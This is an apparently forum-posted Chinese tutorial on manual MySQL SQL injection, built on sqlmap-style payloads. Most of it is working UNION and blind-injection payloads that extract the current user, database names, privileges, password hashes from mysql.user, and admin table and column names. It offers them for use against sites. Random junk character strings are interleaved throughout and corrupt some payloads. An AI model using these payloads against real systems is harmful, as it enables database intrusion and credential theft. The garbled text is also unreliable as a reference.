/ R: Q9 R7 ~/ o# jUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C / _1 I; m. C. f/ QAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL / e0 c# W1 }5 w% aL, NULL# - Y7 `3 `8 [0 i4 }' ]8 h/ \注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。 * F; }6 S* G; o. A ( ?, W8 |1 ~4 {5 d _获取数据库名 9 O! Y( }: J9 e& V : G" D# K. t# j! w+ m7 rUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# & p. h6 O- H/ ?0 m! T& T8 {获取所有用户名4 S/ m T& N" S& Y$ U5 }
8 L7 ^! `5 t* i2 XUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#. t& n* f) |, T
查看当前用户权限1 J* l3 G( l# n, I
' x ~, W( {5 m- }+ b! I
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES# - l9 i, B" w" D1 e. v% M* s尝试获取密码,当然需要有能读mysql数据库的权限. E' ]& Z4 D' }
/ M, X8 C. W/ g# n; LUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user# & U. M2 t9 O: z" X获取表名,limit什么的自己搞啦3 ]. }# D5 ]) }
3 b5 |/ N- q8 k; r+ oUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#0 D+ f: i8 }7 X, G3 o3 P& Y
获取字段名及其类型 + I5 ?) i& S- W' R! a& jUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)# & B$ I0 c; z0 i+ w+ W a 8 W! e4 |% M- Y( k2 V) }
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。 6 i9 {! i& v5 i2 x7 b" L7 b1 e# K" U8 f; x 2 i4 y2 J0 w4 V# V# p3 I; Z
如: $ U. V9 x* [2 P: w( ?9 s获取当前用户名 9 M5 i" U! g# e $ R0 _" y4 o- H; p$ s
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1165 o4 A9 P! v% x3 I+ W) m5 P
获取当前数据库+ \: \6 a* C$ D; q/ X. B# c
9 A+ j' \5 e$ i/ A, [7 pAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1063 C6 {6 P' J) T4 F' V# L" B7 S
获取表名4 f, [5 c0 c v+ r
6 T& {' u* P% L3 E; FAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 511 T- B Y" B& s
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。3 L" L- {1 R# C7 f
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。, N3 R9 h& J h3 p. R
爆表 8 S! ^9 I& I$ z( C; o2 [ 8 b. g% X5 B4 Q/ U2 H* v
AND EXISTS(select * from table)7 D |/ \7 A# D0 x. v
爆字段 - y. L2 R: K5 \9 r% z1 } " n& X2 f4 R V4 l" D
AND EXISTS(select pwd from table) ) ^3 {. k6 y' E盲注的变化就比较多了,由于篇幅,只是举个例子而已。 & J/ O3 D( k1 j1 C! b 2 c H% g6 p. g& a; L
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。9 w1 s9 N9 i) K9 k, H+ J, F) j